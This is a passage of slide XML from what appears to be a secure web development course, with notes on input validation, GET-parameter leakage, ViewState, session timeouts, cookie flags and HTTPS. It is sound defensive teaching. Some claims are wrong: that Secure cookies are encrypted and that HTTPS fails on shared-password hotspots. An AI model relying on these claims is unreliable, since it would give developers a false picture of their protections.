              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>web server processing to retrieve the data from the buffer, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="174982" indent="-174982">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>If ASP.NET, see http://msdn.microsoft.com/en-us/library/ms972976.aspx for a BUNCH of extra processing…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="174982" indent="-174982">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>web server filtering, and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="174982" indent="-174982">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>inspection to dispatch to a web server thread, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>-  etc.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>For a “bad” transaction containing invalid data (perhaps a 6 digit phone number, for example), the web server must then send a “bad” response back to the browser, which involves basically the same processing as above, but in reverse, to get the message back to the client. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This is a lot of overhead just to force the user to correct a simple mistake. And it adds to network bandwidth usage, CPU cycles, memory consumed, and possibly disk I/O for the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Additionally, the user experiences two network delays – one to get the data to the server, and one for the return trip (error message from server). This can add a few frustrating seconds for the user, only to discover that they didn’t enter some required field, or that their telephone number had only 6 digits, or that they typed commas instead of periods in their email address (something I frequently do…), etc.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>All of this overhead and delay can often be avoided if the data is validated/sanitized client-side (you might not even have to write the code if your framework supports validation – like JQuery validation plugin, or if using HTML5, the type, pattern, and require attributes of an input tag. Aside: Note that HTML5 may not work correctly on older browsers…) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Note that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>FOR CLIENT-SIDE ONLY, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>you don’t need to sanitize drop-down list elements and radio buttons. But </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>MAKE SURE that you STILL DO sanitization of All – including these drop-down and radio button – fields on the server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>.  (The reason that you can skip these two items client-side is because IF the user is actually running your validating code, THEN they used your web page to enter these fields, and could only have clicked/selected what the interface provided for these fields; but if the user didn’t use your page to create the data – that is, they have a proxy to allow them to alter your validated data before it is sent to the server -  you can’t do anything about it in your client-side validation code anyway, as we’re already past that stage by the time the proxy traps…).  The idea behind client side validation/sanitization is for user convenience, response time,  and efficiency ONLY – NOT for protection.  Protection is provided ONLY on the server side validation/sanitization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Although you don’t need to sanitize drop-downs and radio buttons, you should still validate that any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>required</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> drop-downs/radio buttons are “set” instead of forcing the error to appear “the long way around” (that is, via the network-to-server-to-network-to-client)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>There are some JavaScript “built-ins” that can do part of the heavy lifting. You can use “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>encodeURI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(string)” for URL-safe strings and “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>encodeURIComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(string)” to escape these other characters as well: “, / ? : @ &amp; = + $ #”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>encodeURI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>("&lt;&gt;?") returns "%3C%3E?", whereas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>encodeURIComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>("&lt;&gt;?") returns "%3C%3E%3F“ – it encoded the “?”, whereas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>encodeURI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> did not))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Not foolproof for protecting against JavaScript exploits - be extra careful – dangerous  JavaScript code may not contain anything but “plain text”, so passes this test.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>JavaScript also supports “regex”, so you can customize validation as you see fit fairly easily.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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19418394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your platform provides validation, use it!  Most of these</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> provided packages have been fairly thoroughly tested, and have addressed some corner cases that you may not consider in your “home grown” code, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But make certain that it is adequate (know WHAT is being validated and how - you may have to use your platform’s validation AND add a few “finishing touches” customized to your particular application)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OWASP provides some help – see ESAPI (Enterprise Security API -  https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API#tab=Downloads )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note: some complain about the overhead required to adequately validate… but how does that overhead compare to being a page-1-above-the-fold headline for having</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> exposed your user’s credit card numbers, health information, or other data? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>I prefer some overhead to court…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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94158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Enough validation –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> for now. Let’s shift gears and look instead at “leaking” sensitive data. (note that this leak may have occurred because of insufficient sanitization/validation…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sensitive information can be accidentally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> leaked.  Your mission is to avoid leaking any information that might be used for nefarious purposes (ID theft, assist an attacker cracking your web site, siphoning money from an account, disclosing trade secrets or corporate strategies, etc.)</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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371298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when using TLS (or SSL), GET URL parameters are exposed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> in several ways that are NOT ENCRYPTED. This is obviously not good…. So don’t do it! Prefer POST over GET, and if sending/receiving sensitive data, use HTTPS to ensure encryption of the data in-flight.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>If you are using TLS/SSL (and you probably SHOULD be…), it is likely that you are working with “sensitive” information, and want to ensure that this data is encrypted during transmission.  If any of this data is included in URL parameters (as may be the case with GET processing), it will NOT be encrypted in the server logs, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>referrer headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, and browser history (an possibly elsewhere).  Referrer headers are NOT encrypted, even if using TLS/SSL – so you have the interesting possibility of an encrypted payload, with some of the “critical” information being transported in “plain text” via the GET parameters in the header… ouch!  Not to mention being in the log files and browser history.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2C20B865-30AA-490B-91EC-B55FD200A00E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1247242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Autocomplete data is saved in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the browser (actual location depends on which browser), and SHOULD be safe from access – but this is a potential exposure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>As shown, there is no guarantee – but we ought to at least try and hope… see: http://www.w3schools.com/tags/att_input_autocomplete.asp</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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3142047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the web was young,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> most web pages were “static”, and attacks were usually launched</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to allow the attacker to gain notoriety in the hacker community, or to “correct” a web site’s message to be more in-line with the attacker’s viewpoint.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These attacks were not without cost to the web site owners: defaced pages had to be repaired (hopefully – but not always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>restored from backups), and the web site could be down for the duration of the recovery process. Denial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> of service attacks could also effectively block visitors to the site. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For online businesses,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the outage due to (D)DOS attacks equated to some lost revenue.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>But large sums of money were not (generally) involved. Costs were mostly limited to inconveniences and nuisances, and relatively small losses in online revenue while the web site was being restored, as really large online retailers (like Amazon, eBay, etc.) didn’t yet exist. and service organizations (airlines, hotels, banks, etc.) were not yet “doing business” on the internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And online databases containing sensitive information were usually on a mainframe someplace, and not even accessible via the web. So PII was (generally) not at risk. AND ID theft was (relatively) rare.</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="429407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full description of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ViewState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, see: http://msdn.microsoft.com/en-us/library/ms972976.aspx. This is a fairly thorough explanation that takes a while to digest…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> “sensitive” information – like passwords, etc. – should not be kept in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ViewState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (as this data can be inspected by proxies, etc.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Basically, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ViewState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is a way of encoding all state information for the current session in a “hidden” form field on each page. By default, ASP.NET routines validate the data in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ViewState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to protect against tampering (by proxies, or any other technique). Because ASP.NET validates this data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ViewState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> can help avoid session hijacking – hijacker would need both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ViewState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> data to “steal” your session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>On the downside, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ViewState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> can get to be fairly large, and is shuttled back and forth to/from the server/client with each screen or data entry.  So </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>viewstate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> can increase bandwidth and add to delays for the user. (more network traffic = longer transmission time – BOTH DIRECTIONS - , and more network congestion if you have a a busy site)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Note that if you ALSO use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ViewStateUserKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, the hashing of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ViewState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> data will be more secure (the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ViewStateUserKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is used to “salt” the hashing algorithm and defeat – or at least hinder –any attempted rainbow table attacks)</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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317584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don’t want</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> authorized sessions to “hang around” if they are not actively being used. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Sessions that are valid for long periods of time are more susceptible to session hijacking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Note that login processing should time out after an appropriate period – if you display a login page, and the response doesn’t come back for an hour, there may be something wrong… don’t accept “late” logins.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Also, ensure that all time-out processing includes actual destruction of all cookies (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> AND any others), etc.  Treat time-outs as a logoff. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>“Shorter is better”.</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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1916403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HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> blocks JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> from accessing cookies (if marked with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>…), which may contain things like your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>.  Note that some older browsers DO NOT honor this flag, but it is still worth setting to reduce your attack surface (as many modern browsers honor this request).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>If JavaScript can access your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, a “bad” script (injected) into your web page (via XSS, for example) can ship the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> off to an attacker, who can then hijack your session.  If your session is with your bank, or if it is with a retailer, etc., you may suffer financial damage as a result.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Secure cookies will be encrypted, so if an attacker finds a way around your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> restriction, the cookie will still NOT expose your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Note that secure cookies work ONLY with HTTPS  (TLS/SSL)</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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15783070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 ensures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> that data on the page is encrypted “in transit”, so no plain-text is sent over the network (see “GET parameter” warning above).  Encryption strength varies, so check with your infrastructure folks and make sure that your server is set to maximize security (TLS 1.2 is current and preferred).  This is covered in more detail later in the Infrastructure section.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Note that if you have any wireless clients you HAVE to use HTTPS to be safe.  Otherwise, it is fairly easy for somebody to become a “man-in-the-middle” (HTTPS may NOT protect you at your local Starbucks or other “community” hot spot b/c there is a shared “password” that all clients use, allowing an attacker on the hot spot to monitor your usage).</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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2702555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 pages are cached in “plain text”.  So don’t cache them.</a:t>
            </a:r>
          </a:p>
          <a:p>
